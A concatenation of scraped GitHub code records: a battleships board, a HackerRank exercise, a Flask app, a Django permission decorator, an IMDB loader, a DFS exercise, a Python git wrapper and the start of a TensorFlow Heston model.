\"\"\"\n self.state, result = self._transitions[self.state]\n return result\n\n def __repr__(self) -> str:\n return f\"<{type(self).__name__}: {self.state}>\"\n\n\nclass Board:\n\n def __init__(self,\n size: int = 12,\n ships: Sequence[int] = (2, 3, 3, 4, 5)) -> None:\n self.size = size\n self._board = [[Field() for _ in range(size)] for _ in range(size)]\n self._ships = [] # type: List[List[Field]]\n self._remaining_ships = list(ships)\n\n def drop_bomb(self, x: int, y: int) -> ShotResult:\n \"\"\"\n Drop bomb on field. Field will change its state appropriately\n and return an informative result to the user. If the\n coordinates point to an invalid field, an exception will be\n raised.\n\n :param x: Shot x-coordinate\n :param y: Shot y-coordinate\n :return: Shot result\n :raise ValueError: Invalid coordinates\n \"\"\"\n try:\n field = self._board[y][x]\n except IndexError as e:\n raise ValueError(\"Invalid coordinates\") from e\n else:\n return field.drop_bomb()\n\n def place_ship(self, size: int, x: int, y: int, horizontal: bool):\n \"\"\"\n Places a ship starting from the field (x, y) and increasing in\n x values if horizontal is true or increasing in y values if\n horizontal is false.\n\n If unsuccessful in placing ship (not enough fields or they are\n already taken) it will raise a ValueError exception.\n\n :param size: Ship size\n :param x: Starting x-coordinate\n :param y: Starting y-coordinate\n :param horizontal: Ship direction\n :raise ValueError: Incorrect arguments\n \"\"\"\n # Check if ship size is valid\n try:\n self._remaining_ships.remove(size)\n except ValueError as e:\n raise ValueError(f\"No more ships of size {size} allowed\") from e\n\n # Check if we can allocate enough fields\n try:\n if horizontal:\n fields = self._board[y][x:x + size]\n else:\n fields = [column[x] for column in self._board[y:y + size]]\n except IndexError as e:\n raise ValueError(\"Not enough space to place ship\") from e\n if len(fields) != size:\n raise ValueError(\"Not enough space to place ship\")\n\n # Check if fields are already taken\n for field in fields:\n if field.state is not FieldState.EMPTY:\n raise ValueError(\"Trying to place on existing ship\")\n\n # Assign fields to a ship\n self._ships.append(fields)\n for field in fields:\n field.state = FieldState.SHIP\n\n @property\n def still_floating(self) -> bool:\n \"\"\"\n Simple check to see if anything is still floating.\n\n :return: true if something floats, false otherwise\n \"\"\"\n for ship in self._ships:\n for part in ship:\n if part.state is FieldState.SHIP:\n return True\n return False\n\n def emojify(self, print_board: bool = True) -> Union[str, None]:\n \"\"\"\n Compact representation of a board leveraging the latest and\n greatest UI toolkits.\n\n :param print_board: Print instead of returning representation.\n :return: If not print_board, return representation.\n \"\"\"\n emojis = {\n FieldState.EMPTY: '🌊',\n FieldState.SHIP: '🚣 ',\n FieldState.HIT: '💥',\n FieldState.MISSED: '🎣'\n }\n meme = '\\n'.join(''.join(emojis[f.state] for f in row)\n for row in reversed(self._board))\n if print_board:\n print(meme)\n return None\n else:\n return meme\n\n def __getitem__(self, item):\n if not isinstance(item, tuple) and len(item) == 2:\n raise ValueError(f\"Expecting coordinates, got {item}\")\n return self._board[item[1]][item[0]]\n\n def __str__(self) -> str:\n \"\"\"\n Have mercy on me. Pipe-y drawing of a board.\n\n :return: Something nicer than the implementation.\n \"\"\"\n num = f' {\" \".join(str(n).center(3) for n in range(self.size))}\\n'\n top = f' ╔{\"╤\".join([\"═══\"] * self.size)}╗\\n'\n mid = f' ╟{\"┼\".join([\"───\"] * self.size)}╢\\n'\n bot = f' ╚{\"╧\".join([\"═══\"] * self.size)}╝\\n'\n\n rows = []\n for number, row in enumerate(reversed(self._board)):\n n = str(self.size - 1 - number)\n r = [field.state.value.center(3) for field in row]\n rows.append(f'{n.rjust(2)}║{\"│\".join(r)}║{n.ljust(2)}\\n')\n return (num + top + mid.join(rows) + bot + num).rstrip()\n","repo_name":"buhanec/_thing","sub_path":"battleships/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71679710568","text":"\"\"\"\nDavid has several containers, each with a number of balls in it. He has just enough containers to sort each type of ball he has into its own container. David wants to sort the balls using his sort method.\n\nDavid wants to perform some number of swap operations such that:\n\nEach container contains only balls of the same type.\nNo two balls of the same type are located in different containers.\nExample\n\n\nDavid has containers and different types of balls, both of which are numbered from to . The distribution of ball types per container are shown in the following diagram.\n\nimage\n\nIn a single operation, David can swap two balls located in different containers.\n\nThe diagram below depicts a single swap operation:\n\nimage\n\nIn this case, there is no way to have all green balls in one container and all red in the other using only swap operations. Return Impossible.\n\nYou must perform queries where each query is in the form of a matrix, . For each query, print Possible on a new line if David can satisfy the conditions above for the given matrix. Otherwise, print Impossible.\n\nFunction Description\n\nComplete the organizingContainers function in the editor below.\n\norganizingContainers has the following parameter(s):\n\nint containter[n][m]: a two dimensional array of integers that represent the number of balls of each color in each container\nReturns\n\nstring: either Possible or Impossible\nInput Format\n\nThe first line contains an integer , the number of queries.\n\nEach of the next sets of lines is as follows:\n\nThe first line contains an integer , the number of containers (rows) and ball types (columns).\nEach of the next lines contains space-separated integers describing row .\n\"\"\"\ndef organizingContainers(container):\n # Write your code here\n number_of_container = len(container[0])\n number_of_content = len(container)\n max_col = list()\n transform_container = list()\n #col max\n for i in range(number_of_container):\n max_col.append(max([j[i] for j in container]))\n transform_container.append([j[i] for j in container])\n \n # print(transform_container)\n # print(max_col)\n pass\nif __name__ == \"__main__\":\n test = True\n if not test:\n test_case = int(input())\n martixs = list()\n for _ in range(test_case):\n size = int(input())\n temp = list()\n for __ in range(size):\n row = list(map(int,input().split(\" \")))\n temp.append(row)\n martixs.append(temp)\n organizingContainers(martixs)\n else:\n test_data = [[1 ,3 ,1],[2, 1, 2], [3, 3, 3]]\n organizingContainers(test_data) \n ","repo_name":"anshjoseph/problems_hackerrank","sub_path":"Organizing_Containers_of_Balls.py","file_name":"Organizing_Containers_of_Balls.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"504984215","text":"import logging.config\n\nimport os\nimport shutil\nfrom flask import Flask, Blueprint\nfrom flask_rest_app import settings\nfrom flask_rest_app.api.imageops.endpoints.image import ns as imageOps_namespace\nfrom flask_rest_app.api.restplus import api\nfrom flask_rest_app.database import db, IMAGE_LOCAL_LOCATION\n\n\ndef configure_app(flask_app):\n flask_app.config['SQLALCHEMY_DATABASE_URI'] = settings.SQLALCHEMY_DATABASE_URI\n flask_app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = settings.SQLALCHEMY_TRACK_MODIFICATIONS\n flask_app.config['SWAGGER_UI_DOC_EXPANSION'] = settings.RESTPLUS_SWAGGER_UI_DOC_EXPANSION\n flask_app.config['RESTPLUS_VALIDATE'] = settings.RESTPLUS_VALIDATE\n flask_app.config['RESTPLUS_MASK_SWAGGER'] = settings.RESTPLUS_MASK_SWAGGER\n flask_app.config['ERROR_404_HELP'] = settings.RESTPLUS_ERROR_404_HELP\n\ndef initialize_app(flask_app):\n configure_app(flask_app)\n\n blueprint = Blueprint('api', __name__, url_prefix='/api')\n api.init_app(blueprint)\n api.add_namespace(imageOps_namespace)\n flask_app.register_blueprint(blueprint)\n\n db.init_app(flask_app)\n\napp = Flask(__name__)\nlog = logging.getLogger(__name__)\ninitialize_app(app)\n\ndef main():\n log.info('>>>>> Starting development server at http://{}/api/ <<<<<'.format(app.config['SERVER_NAME']))\n app.run(host='0.0.0.0', port=8080)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cjsanjay/flask_nginx_docker_app","sub_path":"flask_rest_app/flask_rest_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8552127331","text":"\"\"\"\nDecorator module for permission\n\"\"\"\nimport inspect\nfrom django.db.models import Model\n\n\n__all__ = ['permission_required']\n\n\ndef permission_required(perm, queryset_or_model=None,\n login_url=None, raise_exception=False):\n \"\"\"\n Permission check decorator for classbased/functional generic view\n\n This decorator works as class, method or function decorator without any\n modification.\n DO NOT use ``method_decorator`` or whatever while this decorator will use\n ``self`` argument for method of classbased generic view.\n\n Parameters\n ----------\n perm : string\n A permission string\n queryset_or_model : queryset or model\n A queryset or model for finding object.\n With classbased generic view, ``None`` for using view default queryset.\n When the view does not define ``get_queryset``, ``queryset``,\n ``get_object``, or ``object`` then ``obj=None`` is used to check\n permission.\n With functional generic view, ``None`` for using passed queryset.\n When non queryset was passed then ``obj=None`` is used to check\n permission.\n\n Examples\n --------\n >>> # As class decorator\n >>> @permission_required('auth.change_user')\n >>> class UpdateAuthUserView(UpdateView):\n ... pass\n >>> # As method decorator\n >>> class UpdateAuthUserView(UpdateView):\n ... @permission_required('auth.change_user')\n ... def dispatch(self, request, *args, **kwargs):\n ... pass\n >>> # As function decorator\n >>> @permission_required('auth.change_user')\n >>> def update_auth_user(request, *args, **kwargs):\n ... pass\n\n .. Note::\n Classbased generic view is recommended while you can regulate the queryset\n with ``get_queryset()`` method.\n Detecting object from passed kwargs may not work correctly.\n \"\"\"\n # convert model to queryset\n if queryset_or_model and issubclass(queryset_or_model, Model):\n queryset_or_model = queryset_or_model._default_manager.all()\n\n def wrapper(class_or_method):\n if inspect.isclass(class_or_method):\n from permission.decorators.classbase import \\\n permission_required as decorator\n else:\n # method_permission_required can handle method or function\n # correctly.\n from permission.decorators.methodbase import \\\n permission_required as decorator\n return decorator(perm, queryset_or_model,\n login_url, raise_exception)(class_or_method)\n return wrapper\n","repo_name":"jazzband/django-permission","sub_path":"src/permission/decorators/permission_required.py","file_name":"permission_required.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":303,"dataset":"github-code","pt":"53"} +{"seq_id":"41853843196","text":"# %% Utility Module of crisp-nlp\n\n\"\"\"\nThe utility module allows the user to conduct logistical and tedious steps seamlessly with repeatable functions.\n\"\"\"\n\n# %% Import necessary modules\n\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom nltk.corpus import stopwords\nfrom tqdm import tqdm\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns \nimport pandas as pd \nimport numpy as np \n\nimport time\nimport os\n\n# %% Define load imdb data\n\ndef load_imdb_train_data(path_to_data, random_state=0):\n\n # Create path to train folder\n path_to_train = os.path.join(path_to_data, \"train\")\n\n # Get training files\n train_files = os.listdir(path_to_train)\n # idx - neg\n neg_idx = train_files.index(\"neg\")\n path_to_train_neg = os.path.join(path_to_train, train_files[neg_idx])\n # idx - pos\n pos_idx = train_files.index(\"pos\")\n path_to_train_pos = os.path.join(path_to_train, train_files[pos_idx])\n\n # Import training data\n train_data = pd.DataFrame([])\n print(\"... acquiring data from folder and creating dataframe ...\")\n for negative, positive in tqdm(\n zip(\n os.listdir(path_to_train_neg), os.listdir(path_to_train_pos)\n )\n ):\n\n # Open and read the negative instance of text into a variable\n with open(os.path.join(path_to_train_neg, negative), \"r\") as reader:\n negative_plain_text = reader.read()\n # Open and read the positive instance of text into a variable\n with open(os.path.join(path_to_train_pos, positive), \"r\") as reader:\n positive_plain_text = reader.read()\n\n # Transfer the text for the negative review from the training folder into a dataframe\n df_neg = pd.DataFrame({\"text\": [negative_plain_text], \"sentiment\": [0]})\n # Transfer the the positive review from the training folder into a dataframe\n df_pos = pd.DataFrame({\"text\": [positive_plain_text], \"sentiment\": [1]})\n # Concatenate the negative and positive reivews on to the training dataframe\n train_data = pd.concat([train_data, df_neg, df_pos])\n\n # Shuffle rows to eliminate neg-pos alteration\n train_data = (\n train_data\n .sample(frac=1, random_state=random_state)\n .reset_index(drop=True)\n )\n\n return train_data\n# %%\n","repo_name":"907Resident/idmb-sentiment-clf","sub_path":"src/crisp-nlp/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21050701189","text":"# 위의 그래프를 예시로 삼아서 인접 리스트 방식으로 표현했습니다!\ngraph = {\n 1: [2, 5, 9],\n 2: [1, 3],\n 3: [2, 4],\n 4: [3],\n 5: [1, 6, 8],\n 6: [5, 7],\n 7: [6],\n 8: [5],\n 9: [1, 10],\n 10: [9]\n}\nvisited = []\n\n# 1. starting node 1\n# 2. visit next node and append in the visited array\n# 3. in the current node check the adjesent node and see which one we need to visit\n# 4.\n\n\n\ndef dfs_recursion(adjacent_graph, cur, visited):\n visited.append(cur)\n for adjacent_node in adjacent_graph :\n if adjacent_node not in visited:\n dfs_recursion(adjacent_graph, adjacent_node, visited)\n return\n\n\ndfs_recursion(graph, 1, visited) # 1 이 시작노드입니다!\nprint(visited) # [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] 이 출력되어야 합니다!","repo_name":"skylermbang/Lectures-","sub_path":"hanghae99/sparta_algo/Week4/04_DFTbyRecursion.py","file_name":"04_DFTbyRecursion.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2627359359","text":"\"\"\"\nPython wrapper for git.\n\nThis module is a light Python API for interfacing with it. It calls the git\ncommand line tool directly, so please be careful with using untrusted\nparameters.\n\"\"\"\n\nimport functools\nimport sys\nimport io\nimport subprocess\nfrom collections import defaultdict\nimport email.utils\nimport datetime\nimport urllib.request, urllib.parse, urllib.error\nfrom html import escape\nfrom typing import Any, Dict, IO, Iterable, List, Optional, Tuple, Union\n\n\n# Path to the git binary.\nGIT_BIN = \"git\"\n\n\ndef run_git(\n repo_path: str, params, stdin: bytes = None, silent_stderr=False, raw=False\n) -> Union[IO[str], IO[bytes]]:\n \"\"\"Invokes git with the given parameters.\n\n This function invokes git with the given parameters, and returns a\n file-like object with the output (from a pipe).\n \"\"\"\n params = [GIT_BIN, \"--git-dir=%s\" % repo_path] + list(params)\n\n stderr = None\n if silent_stderr:\n stderr = subprocess.PIPE\n\n if not stdin:\n p = subprocess.Popen(\n params, stdin=None, stdout=subprocess.PIPE, stderr=stderr\n )\n else:\n p = subprocess.Popen(\n params,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=stderr,\n )\n\n assert p.stdin is not None\n p.stdin.write(stdin)\n p.stdin.close()\n\n assert p.stdout is not None\n\n if raw:\n return p.stdout\n\n return io.TextIOWrapper(\n p.stdout, encoding=\"utf8\", errors=\"backslashreplace\"\n )\n\n\nclass GitCommand(object):\n \"\"\"Convenient way of invoking git.\"\"\"\n\n def __init__(self, path: str, cmd: str):\n self._override = True\n self._path = path\n self._cmd = cmd\n self._args: List[str] = []\n self._kwargs: Dict[str, str] = {}\n self._stdin_buf: Optional[bytes] = None\n self._raw = False\n self._override = False\n\n def __setattr__(self, k, v):\n if k == \"_override\" or self._override:\n self.__dict__[k] = v\n return\n k = k.replace(\"_\", \"-\")\n self._kwargs[k] = v\n\n def arg(self, a: str):\n \"\"\"Adds an argument.\"\"\"\n self._args.append(a)\n\n def raw(self, b: bool):\n \"\"\"Request raw rather than utf8-encoded command output.\"\"\"\n self._override = True\n self._raw = b\n self._override = False\n\n def stdin(self, s: bytes):\n \"\"\"Sets the contents we will send in stdin.\"\"\"\n self._override = True\n self._stdin_buf = s\n self._override = False\n\n def run(self):\n \"\"\"Runs the git command.\"\"\"\n params = [self._cmd]\n\n for k, v in list(self._kwargs.items()):\n dash = \"--\" if len(k) > 1 else \"-\"\n if v is None:\n params.append(\"%s%s\" % (dash, k))\n else:\n params.append(\"%s%s=%s\" % (dash, k, str(v)))\n\n params.extend(self._args)\n\n return run_git(self._path, params, self._stdin_buf, raw=self._raw)\n\n\nclass SimpleNamespace(object):\n \"\"\"An entirely flexible object, which provides a convenient namespace.\"\"\"\n\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs)\n\n\nclass smstr:\n \"\"\"A \"smart\" string, containing many representations for ease of use.\"\"\"\n\n raw: str # string, probably utf8-encoded, good enough to show.\n url: str # escaped for safe embedding in URLs (not human-readable).\n html: str # HTML-embeddable representation.\n\n def __init__(self, s: str):\n self.raw = s\n self.url = urllib.request.pathname2url(s)\n self.html = self._to_html()\n\n # Note we don't define __repr__() or __str__() to prevent accidental\n # misuse. It does mean that some uses become more annoying, so it's a\n # tradeoff that may change in the future.\n\n @staticmethod\n def from_url(url):\n \"\"\"Returns an smstr() instance from an url-encoded string.\"\"\"\n return smstr(urllib.request.url2pathname(url))\n\n def split(self, sep):\n \"\"\"Like str.split().\"\"\"\n return [smstr(s) for s in self.raw.split(sep)]\n\n def __add__(self, other):\n if isinstance(other, smstr):\n other = other.raw\n return smstr(self.raw + other)\n\n def _to_html(self):\n \"\"\"Returns an html representation of the unicode string.\"\"\"\n html = \"\"\n for c in escape(self.raw):\n if c in \"\\t\\r\\n\\r\\f\\a\\b\\v\\0\":\n esc_c = c.encode(\"unicode-escape\").decode(\"utf8\")\n html += '%s' % esc_c\n else:\n html += c\n\n return html\n\n\ndef unquote(s: str):\n \"\"\"Git can return quoted file names, unquote them. Always return a str.\"\"\"\n if not (s[0] == '\"' and s[-1] == '\"'):\n # Unquoted strings are always safe, no need to mess with them\n return s\n\n # The string will be of the form `\"\"`, where is a\n # backslash-escaped representation of the name of the file.\n # Examples: \"with\\ttwo\\ttabs\" , \"\\303\\261aca-utf8\", \"\\361aca-latin1\"\n\n # Get rid of the quotes, we never want them in the output.\n s = s[1:-1]\n\n # Un-escape the backslashes.\n # latin1 is ok to use here because in Python it just maps the code points\n # 0-255 to the bytes 0x-0xff, which is what we expect.\n s = s.encode(\"latin1\").decode(\"unicode-escape\")\n\n # Convert to utf8.\n s = s.encode(\"latin1\").decode(\"utf8\", errors=\"backslashreplace\")\n\n return s\n\n\nclass Repo:\n \"\"\"A git repository.\"\"\"\n\n def __init__(self, path: str, name=None, info=None):\n self.path = path\n self.name = name\n self.info: Any = info or SimpleNamespace()\n\n def cmd(self, cmd):\n \"\"\"Returns a GitCommand() on our path.\"\"\"\n return GitCommand(self.path, cmd)\n\n @functools.lru_cache\n def _for_each_ref(self, pattern=None, sort=None, count=None):\n \"\"\"Returns a list of references.\"\"\"\n cmd = self.cmd(\"for-each-ref\")\n if sort:\n cmd.sort = sort\n if count:\n cmd.count = count\n if pattern:\n cmd.arg(pattern)\n\n refs = []\n for l in cmd.run():\n obj_id, obj_type, ref = l.split()\n refs.append((obj_id, obj_type, ref))\n return refs\n\n @functools.cache\n def branch_names(self):\n \"\"\"Get the names of the branches.\"\"\"\n refs = self._for_each_ref(pattern=\"refs/heads/\", sort=\"-authordate\")\n return [ref[len(\"refs/heads/\") :] for _, _, ref in refs]\n\n @functools.cache\n def tags(self, sort=\"-taggerdate\"):\n \"\"\"Get the (name, obj_id) of the tags.\"\"\"\n refs = self._for_each_ref(pattern=\"refs/tags/\", sort=sort)\n return [(ref[len(\"refs/tags/\") :], obj_id) for obj_id, _, ref in refs]\n\n @functools.lru_cache\n def commit_ids(self, ref, limit=None):\n \"\"\"Generate commit ids.\"\"\"\n cmd = self.cmd(\"rev-list\")\n if limit:\n cmd.max_count = limit\n\n cmd.arg(ref)\n cmd.arg(\"--\")\n\n return [l.rstrip(\"\\n\") for l in cmd.run()]\n\n @functools.lru_cache\n def commit(self, commit_id):\n \"\"\"Return a single commit.\"\"\"\n cs = list(self.commits(commit_id, limit=1))\n if len(cs) != 1:\n return None\n return cs[0]\n\n @functools.lru_cache\n def commits(self, ref, limit, offset=0):\n \"\"\"Generate commit objects for the ref.\"\"\"\n cmd = self.cmd(\"rev-list\")\n cmd.max_count = limit + offset\n\n cmd.header = None\n\n cmd.arg(ref)\n cmd.arg(\"--\")\n\n info_buffer = \"\"\n count = 0\n commits = []\n for l in cmd.run():\n if \"\\0\" in l:\n pre, post = l.split(\"\\0\", 1)\n info_buffer += pre\n\n count += 1\n if count > offset:\n commits.append(Commit.from_str(self, info_buffer))\n\n # Start over.\n info_buffer = post\n else:\n info_buffer += l\n\n if info_buffer:\n count += 1\n if count > offset:\n commits.append(Commit.from_str(self, info_buffer))\n\n return commits\n\n @functools.lru_cache\n def diff(self, ref):\n \"\"\"Return a Diff object for the ref.\"\"\"\n cmd = self.cmd(\"diff-tree\")\n cmd.patch = None\n cmd.numstat = None\n cmd.find_renames = None\n if self.info.root_diff:\n cmd.root = None\n # Note we intentionally do not use -z, as the filename is just for\n # reference, and it is safer to let git do the escaping.\n\n cmd.arg(ref)\n\n return Diff.from_str(cmd.run())\n\n @functools.lru_cache\n def refs(self):\n \"\"\"Return a dict of obj_id -> ref.\"\"\"\n cmd = self.cmd(\"show-ref\")\n cmd.dereference = None\n\n r = defaultdict(list)\n for l in cmd.run():\n l = l.strip()\n obj_id, ref = l.split(\" \", 1)\n r[obj_id].append(ref)\n\n return r\n\n @functools.lru_cache\n def tree(self, ref):\n \"\"\"Returns a Tree instance for the given ref.\"\"\"\n return Tree(self, ref)\n\n @functools.lru_cache\n def blob(self, path, ref):\n \"\"\"Returns a Blob instance for the given path.\"\"\"\n cmd = self.cmd(\"cat-file\")\n cmd.raw(True)\n cmd.batch = \"%(objectsize)\"\n\n # Format: :\n # Construct it in binary since the path might not be utf8.\n cmd.stdin(ref.encode(\"utf8\") + b\":\" + path)\n\n out = cmd.run()\n head = out.readline()\n if not head or head.strip().endswith(b\"missing\"):\n return None\n\n return Blob(out.read()[: int(head)])\n\n @functools.cache\n def last_commit_timestamp(self):\n \"\"\"Return the timestamp of the last commit.\"\"\"\n refs = self._for_each_ref(\n pattern=\"refs/heads/\", sort=\"-committerdate\", count=1\n )\n for obj_id, _, _ in refs:\n commit = self.commit(obj_id)\n return commit.committer_epoch\n return -1\n\n\nclass Commit(object):\n \"\"\"A git commit.\"\"\"\n\n def __init__(\n self,\n repo,\n commit_id,\n parents,\n tree,\n author,\n author_epoch,\n author_tz,\n committer,\n committer_epoch,\n committer_tz,\n message,\n ):\n self._repo = repo\n self.id = commit_id\n self.parents = parents\n self.tree = tree\n self.author = author\n self.author_epoch = author_epoch\n self.author_tz = author_tz\n self.committer = committer\n self.committer_epoch = committer_epoch\n self.committer_tz = committer_tz\n self.message = message\n\n self.author_name, self.author_email = email.utils.parseaddr(\n self.author\n )\n\n self.committer_name, self.committer_email = email.utils.parseaddr(\n self.committer\n )\n\n self.subject, self.body = self.message.split(\"\\n\", 1)\n\n self.author_date = Date(self.author_epoch, self.author_tz)\n self.committer_date = Date(self.committer_epoch, self.committer_tz)\n\n # Only get this lazily when we need it; most of the time it's not\n # required by the caller.\n self._diff = None\n\n def __repr__(self):\n return \"\" % (\n self.id[:7],\n \",\".join(p[:7] for p in self.parents),\n self.author_email,\n self.subject[:20],\n )\n\n @property\n def diff(self):\n \"\"\"Return the diff for this commit, in unified format.\"\"\"\n if not self._diff:\n self._diff = self._repo.diff(self.id)\n return self._diff\n\n @staticmethod\n def from_str(repo, buf):\n \"\"\"Parses git rev-list output, returns a commit object.\"\"\"\n if \"\\n\\n\" in buf:\n # Header, commit message\n header, raw_message = buf.split(\"\\n\\n\", 1)\n else:\n # Header only, no commit message\n header, raw_message = buf.rstrip(), \" \"\n\n header_lines = header.split(\"\\n\")\n commit_id = header_lines.pop(0)\n\n header_dict = defaultdict(list)\n for line in header_lines:\n k, v = line.split(\" \", 1)\n header_dict[k].append(v)\n\n tree = header_dict[\"tree\"][0]\n parents = set(header_dict[\"parent\"])\n\n authorhdr = header_dict[\"author\"][0]\n author, author_epoch, author_tz = authorhdr.rsplit(\" \", 2)\n\n committerhdr = header_dict[\"committer\"][0]\n committer, committer_epoch, committer_tz = committerhdr.rsplit(\" \", 2)\n\n # Remove the first four spaces from the message's lines.\n message = \"\"\n for line in raw_message.split(\"\\n\"):\n message += line[4:] + \"\\n\"\n\n return Commit(\n repo,\n commit_id=commit_id,\n tree=tree,\n parents=parents,\n author=author,\n author_epoch=author_epoch,\n author_tz=author_tz,\n committer=committer,\n committer_epoch=committer_epoch,\n committer_tz=committer_tz,\n message=message,\n )\n\n\nclass Date:\n \"\"\"Handy representation for a datetime from git.\"\"\"\n\n def __init__(self, epoch, tz):\n self.epoch = int(epoch)\n self.tz = tz\n self.utc = datetime.datetime.utcfromtimestamp(self.epoch)\n\n self.tz_sec_offset_min = int(tz[1:3]) * 60 + int(tz[4:])\n if tz[0] == \"-\":\n self.tz_sec_offset_min = -self.tz_sec_offset_min\n\n self.local = self.utc + datetime.timedelta(\n minutes=self.tz_sec_offset_min\n )\n\n self.str = self.utc.strftime(\"%a, %d %b %Y %H:%M:%S +0000 \")\n self.str += \"(%s %s)\" % (self.local.strftime(\"%H:%M\"), self.tz)\n\n def __str__(self):\n return self.str\n\n\nclass Diff:\n \"\"\"A diff between two trees.\"\"\"\n\n def __init__(self, ref, changes, body):\n \"\"\"Constructor.\n\n - ref: reference id the diff refers to.\n - changes: [ (added, deleted, filename), ... ]\n - body: diff body, as text, verbatim.\n \"\"\"\n self.ref = ref\n self.changes = changes\n self.body = body\n\n @staticmethod\n def from_str(buf):\n \"\"\"Parses git diff-tree output, returns a Diff object.\"\"\"\n lines = iter(buf)\n try:\n ref_id = next(lines)\n except StopIteration:\n # No diff; this can happen in merges without conflicts.\n return Diff(None, [], \"\")\n\n # First, --numstat information.\n changes = []\n l = next(lines)\n while l != \"\\n\":\n l = l.rstrip(\"\\n\")\n added, deleted, fname = l.split(\"\\t\", 2)\n added = added.replace(\"-\", \"0\")\n deleted = deleted.replace(\"-\", \"0\")\n fname = smstr(unquote(fname))\n changes.append((int(added), int(deleted), fname))\n l = next(lines)\n\n # And now the diff body. We just store as-is, we don't really care for\n # the contents.\n body = \"\".join(lines)\n\n return Diff(ref_id, changes, body)\n\n\nclass Tree:\n \"\"\"A git tree.\"\"\"\n\n def __init__(self, repo: Repo, ref: str):\n self.repo = repo\n self.ref = ref\n\n @functools.lru_cache\n def ls(\n self, path, recursive=False\n ) -> Iterable[Tuple[str, smstr, Optional[int]]]:\n \"\"\"Generates (type, name, size) for each file in path.\"\"\"\n cmd = self.repo.cmd(\"ls-tree\")\n cmd.long = None\n if recursive:\n cmd.r = None\n cmd.t = None\n\n cmd.arg(self.ref)\n if not path:\n cmd.arg(\".\")\n else:\n cmd.arg(path)\n\n files = []\n for l in cmd.run():\n _mode, otype, _oid, size, name = l.split(None, 4)\n if size == \"-\":\n size = None\n else:\n size = int(size)\n\n # Remove the quoting (if any); will always give us a str.\n name = unquote(name.strip(\"\\n\"))\n\n # Strip the leading path, the caller knows it and it's often\n # easier to work with this way.\n name = name[len(path) :]\n\n # We use a smart string for the name, as it's often tricky to\n # manipulate otherwise.\n files.append((otype, smstr(name), size))\n\n return files\n\n\nclass Blob:\n \"\"\"A git blob.\"\"\"\n\n def __init__(self, raw_content: bytes):\n self.raw_content = raw_content\n self._utf8_content = None\n\n @property\n def utf8_content(self):\n if not self._utf8_content:\n self._utf8_content = self.raw_content.decode(\"utf8\", \"replace\")\n return self._utf8_content\n","repo_name":"albertito/git-arr","sub_path":"git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":16607,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"30730332669","text":"import numpy as np\nimport tensorflow.compat.v2 as tf\n\nfrom tf_quant_finance.math import piecewise\nfrom tf_quant_finance.math import random_ops as random\nfrom tf_quant_finance.models import generic_ito_process\nfrom tf_quant_finance.models import utils\n\n\n_SQRT_2 = np.sqrt(2., dtype=np.float64)\n\n\nclass HestonModel(generic_ito_process.GenericItoProcess):\n \"\"\"Heston Model with piecewise constant parameters.\n\n Represents the Ito process:\n\n ```None\n dX(t) = -V(t) / 2 * dt + sqrt(V(t)) * dW_{X}(t),\n dV(t) = kappa(t) * (theta(t) - V(t)) * dt\n + epsilon(t) * sqrt(V(t)) * dW_{V}(t)\n ```\n\n where `W_{X}` and `W_{V}` are 1D Brownian motions with a correlation\n `rho(t)`. `kappa`, `theta`, `epsilon`, and `rho` are positive piecewise\n constant functions of time. Here `V(t)` represents the process variance at\n time `t` and `X` represents logarithm of the spot price at time `t`.\n\n `kappa` corresponds to the mean reversion rate, `theta` is the long run\n price variance, and `epsilon` is the volatility of the volatility.\n\n See [1] and [2] for details.\n\n #### Example\n\n ```python\n import tf_quant_finance as tff\n import numpy as np\n epsilon = PiecewiseConstantFunc(\n jump_locations=[0.5], values=[1, 1.1], dtype=np.float64)\n process = HestonModel(kappa=0.5, theta=0.04, epsilon=epsilon, rho=0.1,\n dtype=np.float64)\n times = np.linspace(0.0, 1.0, 1000)\n num_samples = 10000 # number of trajectories\n sample_paths = process.sample_paths(\n times,\n time_step=0.01,\n num_samples=num_samples,\n initial_state=np.array([1.0, 0.04]),\n random_type=random.RandomType.SOBOL)\n ```\n\n #### References:\n [1]: Cristian Homescu. Implied volatility surface: construction\n methodologies and characteristics.\n arXiv: https://arxiv.org/pdf/1107.1834.pdf\n [2]: Leif Andersen. Efficient Simulation of the Heston Stochastic\n Volatility Models. 2006.\n Link:\n http://www.ressources-actuarielles.net/ext/isfa/1226.nsf/d512ad5b22d73cc1c1257052003f1aed/1826b88b152e65a7c12574b000347c74/$FILE/LeifAndersenHeston.pdf\n \"\"\"\n\n def __init__(self,\n kappa,\n theta,\n epsilon,\n rho,\n dtype=None,\n name=None):\n \"\"\"Initializes the Heston Model.\n\n #### References:\n [1]: Leif Andersen. Efficient Simulation of the Heston Stochastic\n Volatility Models. 2006.\n Link:\n http://www.ressources-actuarielles.net/ext/isfa/1226.nsf/d512ad5b22d73cc1c1257052003f1aed/1826b88b152e65a7c12574b000347c74/$FILE/LeifAndersenHeston.pdf\n Args:\n kappa: Scalar real `Tensor` or an instant of batch-free left-continuous\n `PiecewiseConstantFunc`. Should contain a positive value.\n Corresponds to the mean reversion rate.\n theta: Scalar real `Tensor` or an instant of batch-free left-continuous\n `PiecewiseConstantFunc`. Should contain positive a value of the same\n `dtype` as `kappa`.\n Corresponds to the lond run price 